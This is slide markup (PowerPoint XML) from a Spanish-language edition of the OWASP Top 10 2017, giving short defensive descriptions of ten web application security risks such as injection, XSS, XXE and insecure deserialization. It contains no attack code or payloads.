                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>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endParaRPr lang="es-AR"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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="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 esta edición, hemos actualizado el sistema de clasificación de riesgo en comparación con la versión anterior, para ayudar a calcular la probabilidad y el impacto de cualquier riesgo determinado. Para obtener más información, consulte las </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="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Notas sobre los riesgos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="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000" b="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300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="10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Cada organización es única, y también lo son los agentes de amenaza para esa organización, sus objetivos y el impacto de cualquier brecha. Si una organización de interés público utiliza un sistema de gestión de contenido (CMS) para manipular información pública y el sistema de salud utiliza el mismo CMS para tratar datos sensibles, los agentes de amenaza y los impactos en el negocio son muy distintos para el mismo software. Es fundamental comprender el riesgo para su organización en función de los agentes de amenaza aplicables a su negocio y los impactos comerciales.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="10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 la medida de lo posible, los nombres de los riesgos en el Top 10 están alineados con el marco de las </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="10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Debilidades del CWE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="10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para promover prácticas de seguridad generalmente aceptadas y reducir la confusión. </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727071188"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4914165" y="5268033"/>
          <a:ext cx="1943835" cy="4637965"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1943835">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId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Referencias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100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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Metodología de evaluación de riesgos de OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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Modelado de amenazas y riesgos</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Externas</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <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Std</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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 name="Imagen 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A1DDF5-65CD-4E61-9233-B0304B1292D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20" y="1806355"/>
            <a:ext cx="6858000" cy="2486923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536E2B3D-6D51-41AE-AC16-9D19643F030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395" y="6528176"/>
            <a:ext cx="4824155" cy="720080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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s-AR" noProof="0" dirty="0">
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="344570"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0"/>
              <a:t>OWASP Top 10 2017</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-AR" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-AR" sz="2600" noProof="0" dirty="0"/>
              <a:t>Riesgos en Seguridad de Aplicaciones</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-AR" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200BBCDD-13C0-4D97-9CEC-01B8726246D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497959" y="1105970"/>
            <a:ext cx="5218177" cy="6847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Las fallas de inyección, como SQL, NoSQL, OS o LDAP ocurren cuando se envían datos no confiables a un intérprete, como parte de un comando o consulta. Los datos dañinos del atacante pueden engañar al intérprete para que ejecute comandos involuntarios o acceda a los datos sin la debida autorización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30" name="Freeform 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AB65A7-CD59-4B0C-BAB0-A853DD609B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63149" y="1082570"/>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A1:2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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Inyección</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Freeform 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497959" y="1952466"/>
            <a:ext cx="5218177" cy="730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Las funciones de la aplicación relacionadas a autenticación y gestión de sesiones son implementadas incorrectamente, permitiendo a los atacantes comprometer usuarios y contraseñas, token de sesiones, o explotar otras fallas de implementación para asumir la identidad de otros usuarios (temporal o permanentemente)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32" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56513DEF-2444-40AD-AE64-66E7CC6256D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63149" y="1952466"/>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A2:2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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Pérdida de Autenticación</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Freeform 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0014DB-969D-4359-A7D1-99F0AAA09C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497959" y="2812588"/>
            <a:ext cx="5218177" cy="77733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Muchas aplicaciones web y APIs no protegen adecuadamente datos sensibles, tales como información financiera, de salud o Información Personalmente Identificable (PII). Los atacantes pueden robar o modificar estos datos protegidos inadecuadamente para llevar a cabo fraudes con tarjetas de crédito, robos de identidad u otros delitos. Los datos sensibles requieren métodos de protección adicionales, como el cifrado en almacenamiento y tránsito</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34" name="Freeform 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF109756-C917-4ECB-9826-AC54F0948B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63149" y="2822363"/>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A3:201</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Exposición de datos sensibles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A0868A-364E-4487-8030-7C4BD69D47DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497959" y="3705094"/>
            <a:ext cx="5218177" cy="712245"/>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Muchos procesadores XML antiguos o mal configurados evalúan referencias a entidades externas en documentos XML. Las entidades externas pueden utilizarse para revelar archivos internos mediante la URI o archivos internos en servidores no actualizados, escanear puertos de la LAN, ejecutar código de forma remota y realizar ataques de denegación de servicio (DoS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="90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900" i="1"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6" name="Freeform 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3635AA73-30CD-4FEB-BBAF-A9AD20490C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63149" y="3694295"/>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A4:2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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Entidades Externas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97959" y="4553392"/>
            <a:ext cx="5218177" cy="741599"/>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Las restricciones sobre lo que los usuarios autenticados pueden hacer no se aplican correctamente. Los atacantes pueden explotar estos defectos para acceder, de forma no autorizada, a funcionalidades y/o datos, cuentas de otros usuarios, ver archivos sensibles, modificar datos, cambiar derechos de acceso y permisos, etc.</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63149" y="4564191"/>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A5:2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Pérdida de Control de Acceso</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497959" y="5431044"/>
            <a:ext cx="5218177" cy="728947"/>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La configuración de seguridad incorrecta es un problema muy común y se debe en parte a establecer la configuración de forma manual,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ad hoc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o por omisión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o directamente por la falta de configuración). Son ejemplos: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S3 buckets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abiertos, cabeceras HTTP mal configuradas, mensajes de error con contenido sensible, falta de parches y actualizaciones,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frameworks, </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dependencias y componentes desactualizados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etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Freeform 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A858E023-0889-4FE9-9B01-62527B94C07F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63149" y="5434087"/>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A6:2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ct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Configuración de Seguridad Incorrecta</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR"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97959" y="6300940"/>
            <a:ext cx="5218177" cy="738739"/>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Los XSS ocurren cuando una aplicación toma datos no confiables y los envía al navegador web sin una validación y codificación apropiada; o actualiza una página web existente con datos suministrados por el usuario utilizando una API que ejecuta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JavaScript</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en el navegador. Permiten ejecutar comandos en el navegador de la víctima y el atacante puede secuestrar una sesión, modificar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defacement</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los sitios web, o redireccionar al usuario hacia un sitio malicioso</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42" name="Freeform 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC128063-7A66-4F34-A720-2EAB6E988467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63149" y="6303983"/>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A7:2017</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="970" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secuencia de Comandos en Sitios Cruzados (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Freeform 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E895283-6404-4647-9AED-A7928C930CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497959" y="7175732"/>
            <a:ext cx="5218177" cy="70521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Estos defectos ocurren cuando una aplicación recibe objetos serializados dañinos y estos objetos pueden ser manipulados o borrados por el atacante para realizar ataques de repetición, inyecciones o elevar sus privilegios de ejecución. En el peor de los casos, la deserialización insegura puede conducir a la ejecución remota de código en el servidor.</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63149" y="7173879"/>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A8:2017</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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Deserialización Insegura</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Freeform 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3ABA2A-B6B4-4A1F-B3F6-D4C323A211D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497959" y="8057555"/>
            <a:ext cx="5218177" cy="730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Los componentes como bibliotecas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y otros módulos se ejecutan con los mismos privilegios que la aplicación. Si se explota un componente vulnerable, el ataque puede provocar una pérdida de datos o tomar el control del servidor. Las aplicaciones y API que utilizan componentes con vulnerabilidades conocidas pueden debilitar las defensas de las aplicaciones y permitir diversos ataques e impactos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6" name="Freeform 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591F4221-9110-4B57-9D5B-633059706604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63149" y="8038879"/>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A9:2017</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="1000" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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Componentes con vulnerabilidades conocidas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Freeform 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49216BAC-D272-467A-B5B1-631A0C551A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497959" y="8929304"/>
            <a:ext cx="5218177" cy="71212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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>El registro y monitoreo insuficiente, junto a la falta de respuesta ante incidentes permiten a los atacantes mantener el ataque en el tiempo, pivotear a otros sistemas y manipular, extraer o destruir datos. Los estudios muestran que el tiempo de detección de una brecha de seguridad es mayor a 200 días, siendo típicamente detectado por terceros en lugar de por procesos internos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63149" y="8919966"/>
            <a:ext cx="1422375"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s-AR" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A10:2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
